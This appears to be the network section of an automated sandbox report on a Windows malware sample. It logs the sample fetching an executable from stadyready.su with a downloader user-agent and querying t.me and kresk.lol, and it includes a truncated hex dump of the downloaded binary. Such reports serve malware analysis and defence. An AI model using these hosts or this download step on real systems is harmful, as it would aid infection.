Dec 4, 2024 12:18:07.668306112 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.668349028 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.668365955 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.668378115 CET	49919	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.668384075 CET	443	49919	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.671343088 CET	49922	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.671384096 CET	443	49922	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.671457052 CET	49922	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.671611071 CET	49922	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.671623945 CET	443	49922	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.681427002 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.685352087 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.685401917 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.685415983 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.685468912 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.685492992 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.685507059 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.685516119 CET	49920	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.685520887 CET	443	49920	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.687799931 CET	49923	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.687840939 CET	443	49923	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.687928915 CET	49923	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.688096046 CET	49923	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.688107967 CET	443	49923	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.764673948 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.764746904 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.764949083 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.765162945 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.765180111 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.765204906 CET	49921	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.765211105 CET	443	49921	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.768404007 CET	49924	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.768435001 CET	443	49924	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.768544912 CET	49924	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.768873930 CET	49924	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.768887043 CET	443	49924	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.774121046 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.777919054 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.777997017 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.778063059 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.778131008 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.778150082 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.778160095 CET	49918	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.778166056 CET	443	49918	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.781049013 CET	49925	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.781080008 CET	443	49925	13.107.246.63	192.168.2.4
Dec 4, 2024 12:18:07.781148911 CET	49925	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.781560898 CET	49925	443	192.168.2.4	13.107.246.63
Dec 4, 2024 12:18:07.781574965 CET	443	49925	13.107.246.63	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 12:16:02.079443932 CET	65039	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:16:03.091281891 CET	65039	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:16:03.302381039 CET	53	65039	1.1.1.1	192.168.2.4
Dec 4, 2024 12:16:03.302398920 CET	53	65039	1.1.1.1	192.168.2.4
Dec 4, 2024 12:16:10.962430954 CET	57175	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:16:11.202877998 CET	53	57175	1.1.1.1	192.168.2.4
Dec 4, 2024 12:16:21.949817896 CET	138	138	192.168.2.4	192.168.2.255
Dec 4, 2024 12:17:01.219839096 CET	50880	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:17:01.357688904 CET	53	50880	1.1.1.1	192.168.2.4
Dec 4, 2024 12:17:03.358787060 CET	59902	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:17:03.856484890 CET	53	59902	1.1.1.1	192.168.2.4
Dec 4, 2024 12:17:20.112147093 CET	53	57802	1.1.1.1	192.168.2.4
Dec 4, 2024 12:17:20.207232952 CET	53	51717	1.1.1.1	192.168.2.4
Dec 4, 2024 12:17:20.362754107 CET	59647	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:17:20.362922907 CET	58601	53	192.168.2.4	1.1.1.1
Dec 4, 2024 12:17:20.499891996 CET	53	58601	1.1.1.1	192.168.2.4
Dec 4, 2024 12:17:20.500040054 CET	53	59647	1.1.1.1	192.168.2.4
Dec 4, 2024 12:17:22.933803082 CET	53	65420	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 4, 2024 12:16:02.079443932 CET	192.168.2.4	1.1.1.1	0xbad9	Standard query (0)	stadyready.su	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:16:03.091281891 CET	192.168.2.4	1.1.1.1	0xbad9	Standard query (0)	stadyready.su	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:16:10.962430954 CET	192.168.2.4	1.1.1.1	0x4a63	Standard query (0)	iHFuwBwsuPMSXCezcESiLqwrfPI.iHFuwBwsuPMSXCezcESiLqwrfPI	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:01.219839096 CET	192.168.2.4	1.1.1.1	0x7aa1	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:03.358787060 CET	192.168.2.4	1.1.1.1	0x9bbe	Standard query (0)	kresk.lol	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:20.362754107 CET	192.168.2.4	1.1.1.1	0xb7d2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:20.362922907 CET	192.168.2.4	1.1.1.1	0x1bf5	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 4, 2024 12:16:03.302381039 CET	1.1.1.1	192.168.2.4	0xbad9	No error (0)	stadyready.su		5.101.153.57	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:16:03.302398920 CET	1.1.1.1	192.168.2.4	0xbad9	No error (0)	stadyready.su		5.101.153.57	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:16:11.202877998 CET	1.1.1.1	192.168.2.4	0x4a63	Name error (3)	iHFuwBwsuPMSXCezcESiLqwrfPI.iHFuwBwsuPMSXCezcESiLqwrfPI	none	none	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:01.357688904 CET	1.1.1.1	192.168.2.4	0x7aa1	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:03.856484890 CET	1.1.1.1	192.168.2.4	0x9bbe	No error (0)	kresk.lol		159.69.102.165	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:17:20.499891996 CET	1.1.1.1	192.168.2.4	0x1bf5	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 4, 2024 12:17:20.500040054 CET	1.1.1.1	192.168.2.4	0xb7d2	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

slscr.update.microsoft.com

otelrules.azureedge.net

t.me

kresk.lol

www.google.com

stadyready.su

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	5.101.153.57	80	7680	C:\Users\user\Desktop\xoJxSAotVM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 12:16:03.427519083 CET	89	OUT	GET /din.exe HTTP/1.1 accept: / user-agent: downloader/0.2.8 host: stadyready.su
Dec 4, 2024 12:16:04.837083101 CET	1236	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Wed, 04 Dec 2024 11:16:04 GMT Content-Type: application/octet-stream Content-Length: 1188347 Last-Modified: Mon, 02 Dec 2024 12:24:06 GMT Connection: keep-alive Keep-Alive: timeout=30 ETag: "674da6e6-1221fb" Expires: Fri, 03 Jan 2025 11:16:04 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 ca 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 7c ac 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8@p\|@@&X`(`.textrt `.rdatan+,x@@.data+@.ndata.rsrc&XZ@@.reloc`@B
Dec 4, 2024 12:16:04.837316990 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu
Dec 4, 2024 12:16:04.837327957 CET	1236	IN	Data Raw: 08 ff 15 90 92 40 00 83 65 f4 00 89 45 0c 8d 45 e4 50 ff 75 08 ff 15 94 92 40 00 8b 7d f0 83 65 f0 00 8b 1d 44 90 40 00 e9 89 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 99 f7 ff 89 4d 10 0f b6 c0 c1 e0 08 89 45 14 Data Ascii: @eEEPu@}eD@FRVVU+MMEFQNUMMVTUFPEEPMH@EPEEPu@uE9}n~Xtev4L@EtU}jWEEP@vXW
Dec 4, 2024 12:16:04.837879896 CET	1236	IN	Data Raw: 47 00 ff 75 0c ff 75 08 ff d0 eb 0c ff 75 fc ff 15 08 90 40 00 33 c0 40 5f 5e 5b c9 c2 0c 00 39 1d 90 eb 47 00 75 ee ff 75 0c ff 75 08 ff 15 0c 90 40 00 85 c0 75 de eb df 55 8b ec a1 e4 c0 40 00 8b 40 04 56 85 c0 74 04 8b f0 eb 0c 8b 35 64 eb 47 Data Ascii: Guuu@3@_^[9Guuu@uU@@Vt5dGEPGEPjj"PV@#E^]UGSVuWjY}UMi@i@EGE@E3]G$0@Rh@L
Dec 4, 2024 12:16:04.837899923 CET	1236	IN	Data Raw: c7 45 fc 01 00 00 00 66 89 06 e9 e6 16 00 00 6a ef e8 58 fa ff ff 50 56 e8 a0 44 00 00 85 c0 0f 85 d0 16 00 00 c7 45 fc 01 00 00 00 e9 c4 16 00 00 6a 31 e8 36 fa ff ff 8b f0 8b 45 d4 8b c8 c1 f8 03 56 83 e0 02 83 e1 07 50 51 68 d8 9b 40 00 89 75 Data Ascii: EfjXPVDEj16EVPQh@uMHVBV@tVEhpMVEPLPEVE@A}\|1VoH3;tMQPd@E#@E9]uVC3}@Ph@VCE
Dec 4, 2024 12:16:04.838947058 CET	1236	IN	Data Raw: 3b c3 74 5e 48 3b fb 74 0a 8b 3f 3b c3 75 f5 3b fb 75 22 ff 75 dc 68 f4 99 40 00 e8 ed 43 00 00 59 59 68 10 00 20 00 6a e8 53 e8 40 49 00 00 50 e9 45 fd ff ff 83 c7 04 57 be e8 c0 40 00 56 e8 2f 41 00 00 a1 e0 c0 40 00 83 c0 04 50 57 e8 20 41 00 Data Ascii: ;t^H;t?;u;u"uh@CYYh jS@IPEW@V/A@PW A@VP';t+;uh@CYGPV@@W4h@j@$@uFPH@5@cjYjYEEEtj3EEtjDE
Dec 4, 2024 12:16:04.838958979 CET	1236	IN	Data Raw: f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 7d 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 f0 97 40 00 e9 c5 f7 ff ff 6a 11 e8 94 f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 c0 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 ac Data Ascii: h VW}NuEVWh@jh VWNuEVWh@E9GjRjIE9]tW4@E;ujSW8@E;uuH?;t=]9]tutBE9h@h@hGh u
Dec 4, 2024 12:16:04.839741945 CET	1236	IN	Data Raw: e8 2e ec ff ff 89 45 ec 39 5d ec 0f 84 68 08 00 00 e9 93 f1 ff ff 3b d3 74 04 8b fa eb 0c 8b 3d 64 eb 47 00 81 c7 01 00 00 80 8b 45 e4 89 45 f0 8b 45 e8 6a 02 89 45 ec e8 b5 eb ff ff 6a 11 89 45 f4 e8 ab eb ff ff 57 89 45 08 e8 32 39 00 00 59 53 Data Ascii: .E9]h;t=dGEEEjEjEWE29YSEEPGSPSSSu3FWu@]@A9uuBj#`WI7WuDuEu9uuh@9h@9j^9uu'jYPu@AuuuhH@
Dec 4, 2024 12:16:04.839775085 CET	776	IN	Data Raw: 5d e0 75 30 66 83 7d cc 0d 74 32 66 83 7d cc 0a 74 2b 66 8b 45 08 0f b7 c8 66 89 04 77 46 89 4d cc 66 3b c3 0f 84 15 ff ff ff 3b 75 f8 7c aa e9 0b ff ff ff 0f b7 45 08 e9 c8 fe ff ff 66 8b 45 08 66 39 45 cc 74 14 66 83 f8 0d 0f 84 d5 fe ff ff 66 Data Ascii: ]u0f}t2f}t+fEfwFMf;;u\|EfEf9EtffjSjf97uSjYPV1P`@9]PWf9V1Pd@f9TPW1Ph@+j=TQPl@u
Dec 4, 2024 12:16:04.840754032 CET	1236	IN	Data Raw: 00 00 00 33 c9 e8 f6 e3 ff ff 83 f8 20 0f 83 ba e9 ff ff 39 5d e0 74 1f 39 5d dc 74 0f 50 e8 3d e2 ff ff 53 53 e8 88 e1 ff ff eb 71 53 e8 79 e2 ff ff e9 52 fd ff ff 39 5d dc 74 12 8b 4d d8 8b 15 bc ea 47 00 89 8c 82 94 00 00 00 eb 4f 8b 0d bc ea Data Ascii: 3 9]t9]tP=SSqSyR9]tMGOGW7:FS#Pju@9]t!SSu@jP2PV.EhG3_^[I@@<@P@r@@@B@n@@@@@6@@b@
Dec 4, 2024 12:16:04.957259893 CET	1236	IN	Data Raw: fc 29 75 f8 89 45 f4 83 7d ec 01 0f 85 39 ff ff ff eb 37 39 45 14 0f 8f 02 ff ff ff eb 2c 6a fc e9 99 fe ff ff 6a fe e9 92 fe ff ff 3b df 74 62 39 75 14 7d 03 8b 75 14 56 53 e8 dd fd ff ff 85 c0 0f 84 75 fe ff ff 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 Data Ascii: )uE}979E,jj;tb9u}uVSuuE_^[u9u}uVpBSIWEPVSuT@t;uuu)u9}U(SV3W]]@h NVSG@jhV(}=@u@

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:16:19 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZvmSW+YphKmpmnN&MD=UsTpCsxu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-04 11:16:20 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 6125b8b5-85a8-44a0-a748-e4729ee7b8c4 MS-RequestId: 3567cab8-a65d-4e37-9d4e-88ae49f56fac MS-CV: BhPp9amOyU2/udhH.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 04 Dec 2024 11:16:19 GMT Connection: close Content-Length: 24490
2024-12-04 11:16:20 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-12-04 11:16:20 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.202.163.200	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:16:59 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZvmSW+YphKmpmnN&MD=UsTpCsxu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-04 11:17:00 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: a7c647f3-05ca-4cb5-a477-d3566de073a1 MS-RequestId: 5d055b01-f7b0-4c3e-b651-ee4881a4a54b MS-CV: qfI2mGX8HEqHWlF4.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 04 Dec 2024 11:16:59 GMT Connection: close Content-Length: 30005
2024-12-04 11:17:00 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-12-04 11:17:00 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49738	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:00 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:00 UTC	471	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:00 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Tue, 03 Dec 2024 18:21:00 GMT ETag: "0x8DD13C73D7EC056" x-ms-request-id: 85afd668-301e-0052-47c3-4565d6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111700Z-1746fd949bddtfvqhC1EWRxbpg000000010g000000006eva x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:00 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-12-04 11:17:00 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
